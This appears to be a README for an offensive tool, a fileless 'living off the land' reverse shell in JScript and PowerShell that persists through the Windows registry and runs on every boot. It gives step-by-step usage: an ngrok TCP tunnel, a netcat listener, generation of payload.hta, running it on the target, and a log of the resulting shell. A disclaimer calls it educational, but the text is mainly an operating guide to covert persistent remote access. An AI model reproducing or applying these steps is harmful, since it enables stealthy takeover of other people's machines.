This is a fileless living off the land reverse shell written in JScript and Powershell script. It runs every time the windows boots and relies solely on windows registry and environment variables to execute without creating any files on the system
Disclaimer: this program is only for educational purposes
WARNING: Since editing windows registries can cause some problems, I really recommend running this program on a virtual machine
download the repository and run POC.hta file on your windows system
Now every time you reboot your windows a messagebox with 'living off the land' message will appear
In this case I'm using ngrok to make a tcp tunnel:
ngrok tcp 3333
then we run netcat to listen on port 3333
nc -nvlp 3333
Now we can create out payload with our ngrok tunnel's domain and port
python.exe 18053 payload.hta
all you have to do now is to run payload.hta in your windows machine and you get a reverse shell
└──╼ $nc -nvlp 3333
listening on [any] 3333 ...
connect to [] from (UNKNOWN) [] 50662
> echo hello
this reverse shell is persistent meaning every time you boot the windows the payload will execute